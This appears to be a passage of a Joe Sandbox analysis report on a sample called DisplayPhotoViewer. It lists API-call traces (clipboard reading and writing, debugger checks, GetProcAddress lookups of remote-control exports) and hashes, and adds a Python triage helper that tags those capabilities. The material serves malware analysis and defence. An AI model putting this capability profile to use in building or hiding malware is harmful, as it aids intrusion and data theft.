                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 2579439406-0
                                                                                                    • Opcode ID: c9fea3f99d28007ee1d046f727e3519cc0a848400dffe03d16d24a66a6d7ca6c
                                                                                                    • Instruction ID: 7c7fcc348ea41e253e3abc31e65c406ce9bbda84a24d4b4c4f59504c427db7e4
                                                                                                    • Opcode Fuzzy Hash: c9fea3f99d28007ee1d046f727e3519cc0a848400dffe03d16d24a66a6d7ca6c
                                                                                                    • Instruction Fuzzy Hash: AF21BD78807326DFC786DFD5D1C4668FBA4BB08309F508129F9299B359F7B05981CB45
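Two of the records above deserve a second look when scoring this sample: the clipboard reader at 11031201 (IsClipboardFormatAvailable, GetClipboardData, GetClipboardFormatNameA, GlobalUnlock) and the stub at 11161447 (IsDebuggerPresent, SetUnhandledExceptionFilter(0), UnhandledExceptionFilter, GetCurrentProcess with C0000409 already on the stack, TerminateProcess). The Python below is an added triage helper, not part of the Joe Sandbox report and not code from the analysed sample: it parses records in this layout into structured data, derives the RVA of each function's first direct call site from the 'Offset:' base so the function can be found in a disassembler, and applies two heuristics. The first tags GetClipboardData/SetClipboardData as clipboard-read/write capability. The second is the analyst's assumption rather than a report finding: the five-call sequence ending in TerminateProcess with 0xC0000409 (STATUS_STACK_BUFFER_OVERRUN) is the MSVC runtime's /GS security-failure stub, which the IsDebuggerPresent signature trips on in practically every MSVC-built binary, so it is tagged as such rather than as anti-debug, while any other IsDebuggerPresent use is tagged anti-debug-candidate. The sample text is constructed from records on this page, abridged to the lines the parser reads; the tag names are the example's own.

```python
import re
from dataclasses import dataclass, field

STATUS_STACK_BUFFER_OVERRUN = "C0000409"   # exit code of MSVC's /GS failure path
# Assumed (not stated by the report): this order plus that code is the CRT security-failure stub, not anti-debug.
CRT_GS_STUB = ["IsDebuggerPresent", "SetUnhandledExceptionFilter",
               "UnhandledExceptionFilter", "GetCurrentProcess", "TerminateProcess"]

@dataclass
class ApiCall:
    name: str
    module: str
    args: list          # stack values as the sandbox printed them ('?' = unknown)
    ref: int            # call-site virtual address
    subcall: bool       # 'Part of subcall function ...': the call lives in a callee

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    base: int = 0       # module load base from 'Offset:' on the Source File line
    api_id: str = ""

    def rva(self):
        # lowest direct call site relative to the module base, for a disassembler pivot
        refs = [c.ref for c in self.calls if not c.subcall]
        return min(refs) - self.base if refs else None

API_RE = re.compile(r"^•\s*(?P<sub>Part of subcall function [0-9A-F]+: )?(?P<name>\w+)\.(?P<mod>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)$")
BASE_RE = re.compile(r"Offset:\s*([0-9A-F]+)")

def parse_records(text):
    # one FunctionRecord per 'APIs' header; report lines the regexes do not match are skipped
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m.group("args").split(",") if m.group("args") else []
            cur.calls.append(ApiCall(m.group("name"), m.group("mod"), args,
                                     int(m.group("ref"), 16), bool(m.group("sub"))))
        elif line.startswith("• Source File:") and BASE_RE.search(line):
            cur.base = int(BASE_RE.search(line).group(1), 16)
        elif line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
    return records

def _in_order(seq, needles):
    # True if every needle occurs in seq in the given order (gaps allowed)
    it = iter(seq)
    return all(any(x == n for x in it) for n in needles)

def tag_record(rec):
    # capability tags for one record; subcall entries belong to callees and are ignored
    names = [c.name for c in rec.calls if not c.subcall]
    stack_values = {a for c in rec.calls for a in c.args}
    tags = set()
    if "GetClipboardData" in names:
        tags.add("clipboard-read")
    if "SetClipboardData" in names:
        tags.add("clipboard-write")
    if _in_order(names, CRT_GS_STUB) and STATUS_STACK_BUFFER_OVERRUN in stack_values:
        tags.add("crt-gs-failure-stub")
    elif "IsDebuggerPresent" in names:
        tags.add("anti-debug-candidate")
    return tags

def triage(text):
    return [{"rva": hex(r.rva()) if r.rva() is not None else None,
             "api_id": r.api_id, "tags": sorted(tag_record(r))}
            for r in parse_records(text)]

# Constructed sample: three records copied from this report, abridged to the lines the parser reads.
SAMPLE = """APIs
• IsClipboardFormatAvailable.USER32(?), ref: 11031201
• GetClipboardData.USER32(?), ref: 1103121D
• GetClipboardFormatNameA.USER32(?,?,00000050), ref: 1103129C
• GetLastError.KERNEL32 ref: 110312A6
• GlobalUnlock.KERNEL32(00000000), ref: 110312C6
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
APIs
• IsDebuggerPresent.KERNEL32 ref: 11161447
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1116145C
• UnhandledExceptionFilter.KERNEL32(111B53C0), ref: 11161467
• GetCurrentProcess.KERNEL32(C0000409), ref: 11161483
• TerminateProcess.KERNEL32(00000000), ref: 1116148A
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
APIs
  • Part of subcall function 10707967: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,10708E6F,00000002), ref: 107079A4
• GetTimeZoneInformation.KERNEL32(0000000C,10723E48,?,74DEE860,0000000B,0000000B), ref: 1070E0AB
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
"""
```

triage(SAMPLE) returns one row per record with the RVA, the report's own API ID and the tags: the clipboard function comes out as clipboard-read at RVA 0x31201 in the 11000000 module, the IsDebuggerPresent record as crt-gs-failure-stub at 0x161447, and the time-zone function with no tag because its InitializeCriticalSection entry is a subcall and is not counted against it. The subcall exclusion matters: those lines are stack values captured inside callees, so attributing them to the parent function inflates its apparent capability.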
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(000000FF), ref: 110BB79D
                                                                                                    • ShowWindow.USER32(000000FF,00000009,?,11059DC3,00000001,00000001,?,00000000), ref: 110BB7AD
                                                                                                    • BringWindowToTop.USER32(000000FF), ref: 110BB7B7
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110BB7D8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$BringCurrentIconicShowThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 4184413098-0
                                                                                                    • Opcode ID: 31494d892e8100fcbfaa23e70e384c7c1f6a499a1b18dbbc48b2bf6a2173a498
                                                                                                    • Instruction ID: a0c4440e808d33b79f7ecfaf84325f8980d896f28aecb9145359e8943c2f05a4
                                                                                                    • Opcode Fuzzy Hash: 31494d892e8100fcbfaa23e70e384c7c1f6a499a1b18dbbc48b2bf6a2173a498
                                                                                                    • Instruction Fuzzy Hash: C431B43AE016159FDB24DF24D4C079A7BA8BF44354F0580BAEC06AF246D775E844CBE0
                                                                                                    APIs
                                                                                                      • Part of subcall function 10707967: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,10708E6F,00000002,?,?,5C74726F,1070599D,?,107059D7,10712290,10712290,00000040,10702706), ref: 107079A4
                                                                                                      • Part of subcall function 10707967: EnterCriticalSection.KERNEL32(?,?,?,10708E6F,00000002,?,?,5C74726F,1070599D,?,107059D7,10712290,10712290,00000040,10702706,?), ref: 107079BF
                                                                                                      • Part of subcall function 107079C8: LeaveCriticalSection.KERNEL32(?,107047BD,00000009,107047A9,00000000,?,00000000,10712290,?), ref: 107079D5
                                                                                                    • GetTimeZoneInformation.KERNEL32(0000000C,10723E48,?,74DEE860,0000000B,0000000B,?,1070E038,1070D4A6,10723E48,?,74DEE860,?,1070D14B,?,?), ref: 1070E0AB
                                                                                                    • WideCharToMultiByte.KERNEL32(00000220,10715E84,000000FF,0000003F,00000000,?,?,1070E038,1070D4A6,10723E48,?,74DEE860,?,1070D14B,?,?), ref: 1070E141
                                                                                                    • WideCharToMultiByte.KERNEL32(00000220,10715ED8,000000FF,0000003F,00000000,?,?,1070E038,1070D4A6,10723E48,?,74DEE860,?,1070D14B,?,?), ref: 1070E17A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
                                                                                                    • String ID:
                                                                                                    • API String ID: 3442286286-0
                                                                                                    • Opcode ID: 7b5234065218c4dd29281a33798bf34cee47203c026abf4c3338e33627006583
                                                                                                    • Instruction ID: c0148b1f78154fad7415005fc398e2e7a507128feeb73278a3172e4241bfa43c
                                                                                                    • Opcode Fuzzy Hash: 7b5234065218c4dd29281a33798bf34cee47203c026abf4c3338e33627006583
                                                                                                    • Instruction Fuzzy Hash: 2A61F571904264EED7198F28DCC5B693FE9F70B350F184B2BE0849B2E8D7705982CB59
                                                                                                    APIs
                                                                                                    • IsValidCodePage.KERNEL32(00000000,10714970,?,107148EC,10708081,?,10715C58,?,?,?,00000000), ref: 1070B059
                                                                                                    • IsValidLocale.KERNEL32(00000001), ref: 1070B06F
                                                                                                      • Part of subcall function 1070B6A6: GetVersionExA.KERNEL32(?), ref: 1070B6C0
                                                                                                      • Part of subcall function 1070B4E8: EnumSystemLocalesA.KERNEL32(1070B51F,00000001,10714970,?,107148EC,10708081,?,10715C58,?,?,?,00000000), ref: 1070B508
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Valid$CodeEnumLocaleLocalesPageSystemVersion
                                                                                                    • String ID:
                                                                                                    • API String ID: 2902790910-0
                                                                                                    • Opcode ID: c783f8a0fbb7be298f7da548e026fbabb19134860736677e35be28a5ff60a5c8
                                                                                                    • Instruction ID: 2d16540773d5e875f80d42c3a1144de8161cb96f2d24828296457a98fe05306c
                                                                                                    • Opcode Fuzzy Hash: c783f8a0fbb7be298f7da548e026fbabb19134860736677e35be28a5ff60a5c8
                                                                                                    • Instruction Fuzzy Hash: 53312872A04261EBD7645F608CC1A3B37D4DB0B780F098229F550DE1E8E7B29F88C719
APIs
• GetClipboardFormatNameA.USER32(?,?,00000050), ref: 11031496
• SetClipboardData.USER32(00000000,00000000), ref: 110314B2
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Clipboard$DataFormatName
• String ID:
• API String ID: 3172747766-0
• Opcode ID: c7bf5b5d787434796ce995803704dc1451f4c3157c670a0baf3001e37c6f6af3
• Instruction ID: a3c2bb49cae5d96da6982b4746d159a6771573a4c6a789ac32fb488b2cf825bf
• Opcode Fuzzy Hash: c7bf5b5d787434796ce995803704dc1451f4c3157c670a0baf3001e37c6f6af3
• Instruction Fuzzy Hash: 4201D470D26625AED711DF609840A7EB3F8AF8971BF01806AEC4096044EF39EA0087A2
APIs
• GetLocaleInfoW.KERNEL32(?,?,?,?,?,?), ref: 1070E7E0
• WideCharToMultiByte.KERNEL32(00000000,00000220,?,000000FF,?,?,00000000,00000000,?,?,?,?), ref: 1070E806
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: ByteCharInfoLocaleMultiWide
• String ID:
• API String ID: 1196101659-0
• Opcode ID: 0622e79bc621382e04ee5d969facebd94557347d53a8588a73571d60e4c94c78
• Instruction ID: d208ce273e2f815554ad0fd5cc5e384a68f5dff77026939023bcc5692784f133
• Opcode Fuzzy Hash: 0622e79bc621382e04ee5d969facebd94557347d53a8588a73571d60e4c94c78
• Instruction Fuzzy Hash: D0F03031905129EBCF224F41DC49A8F7F75FB4A7A0F108A15F925A21E4D7304950DAD0
APIs
• GetLocaleInfoA.KERNEL32(?,?,?,10715E60,?,10715E60,00000001,00000004,00000000,?,?), ref: 1070E6C7
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,000000FF,00000000,00000004,?,10715E60,?,10715E60,00000001,00000004,00000000,?,?), ref: 1070E6E8
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: ByteCharInfoLocaleMultiWide
• String ID:
• API String ID: 1196101659-0
• Opcode ID: 96780ca37108b1cb992badbe6699df8a29fa8998b8c3766268cacb95fc440e81
• Instruction ID: 44255aef8a7295c0d1d196d92c7802973bc71fb88d427546a4a905f584c99037
• Opcode Fuzzy Hash: 96780ca37108b1cb992badbe6699df8a29fa8998b8c3766268cacb95fc440e81
• Instruction Fuzzy Hash: EEF05E32904129EBCF228F95EC05A8E7BB1FB967B1F108B25F935621E4D7724821DA94
APIs
• GetLocaleInfoA.KERNEL32(?,?,?,?), ref: 1070B71D
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 603e90d914acb86c3d242c26025f8b1f79bb14fd2f7965f3d1cb6f1197a141ab
• Instruction ID: 891b4867fabae4b75406de1606f1bccba7f2eb61476d953d311ebbc39e61a55b
• Opcode Fuzzy Hash: 603e90d914acb86c3d242c26025f8b1f79bb14fd2f7965f3d1cb6f1197a141ab
• Instruction Fuzzy Hash: 38212B33614106ABCF5C8E34ED85A7977D4EBC6241B522337E541CE2E9EA31DF408294
APIs
• EnumSystemLocalesA.KERNEL32(1070B1D1,00000001,107148EC,10708081,?,10715C58,?,?,?,00000000), ref: 1070B1B0
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: EnumLocalesSystem
• String ID:
• API String ID: 2099609381-0
• Opcode ID: b58e2cc3e0bdee12638f17c059a55837449964bf8aa8dc8caa19b6b66757f84d
• Instruction ID: 4f8aad5dc0d49090472095e44a2879dd1d5a2a5bfdd389ff4fe599b354856bd4
• Opcode Fuzzy Hash: b58e2cc3e0bdee12638f17c059a55837449964bf8aa8dc8caa19b6b66757f84d
• Instruction Fuzzy Hash: D5F08C7195022ADAD7499F38CC8C7643AE1EB0FB90F488318E401DE1E8C7B94688CA08
APIs
• EnumSystemLocalesA.KERNEL32(1070B42B,00000001,?,107148EC,10708081,?,10715C58,?,?,?,00000000), ref: 1070B414
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: EnumLocalesSystem
• String ID:
• API String ID: 2099609381-0
• Opcode ID: 034e3c9c44b1b213fe6df325d2b94d967620c65e6282372060365d02868db8a1
• Instruction ID: 1522ecac8974a96ce0cb040e9b8d5f98c3404ae0f1a59b7f1179d17f2e711051
• Opcode Fuzzy Hash: 034e3c9c44b1b213fe6df325d2b94d967620c65e6282372060365d02868db8a1
• Instruction Fuzzy Hash: 01E0E571D641A6DBD7899F34EC887343AE2F70BB04F888329F800CD1E5C7B607899A08
APIs
• EnumSystemLocalesA.KERNEL32(1070B51F,00000001,10714970,?,107148EC,10708081,?,10715C58,?,?,?,00000000), ref: 1070B508
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: EnumLocalesSystem
• String ID:
• API String ID: 2099609381-0
• Opcode ID: 3afa70a39ca403402ad0e03a5240f4bb3dfffd867d7e447d035812c40a3e0292
• Instruction ID: fd8d6d96d92f3c4e19e1cf05d3421639372ea46b410982ab85a565a448a306f4
• Opcode Fuzzy Hash: 3afa70a39ca403402ad0e03a5240f4bb3dfffd867d7e447d035812c40a3e0292
• Instruction Fuzzy Hash: C6D05E70A10215DBD3055F74CC4D3683AD0F709B04F888758E941CD5D4C7B586588A08
APIs
• EnumSystemLocalesA.KERNEL32(1070B51F,00000001,10714970,?,107148EC,10708081,?,10715C58,?,?,?,00000000), ref: 1070B508
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: EnumLocalesSystem
• String ID:
• API String ID: 2099609381-0
• Opcode ID: cb904d8ab951b1aac1cb3040dff10214636949997c0b356a6f6896e45895d15e
• Instruction ID: 912d9d15002fd7dc13820c7f194bd3e2b7795722595d0d8cea61aadd4b8455e3
• Opcode Fuzzy Hash: cb904d8ab951b1aac1cb3040dff10214636949997c0b356a6f6896e45895d15e
• Instruction Fuzzy Hash: 35D05E70A00225DBD3055F34CC4D7683A91F70AB04F44C758E901CD1E4C3F546288B08
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9101c8981777dbf91fd094bb265ccfd78d2d18e03138f204675a9a3a2b2866e2
• Instruction ID: 29231fc69e5b00f90719352c1b3e23618dc7d1b02cf746d73d11017b8e76b9d2
• Opcode Fuzzy Hash: 9101c8981777dbf91fd094bb265ccfd78d2d18e03138f204675a9a3a2b2866e2
• Instruction Fuzzy Hash: 75C1FB309086E55BD719CF7D88A046DFFF19E96201748C69EE4F68B682C278D614DBB0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_version), ref: 1105F297
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_installed), ref: 1105F2BC
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_netname), ref: 1105F2E2
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_remotename), ref: 1105F308
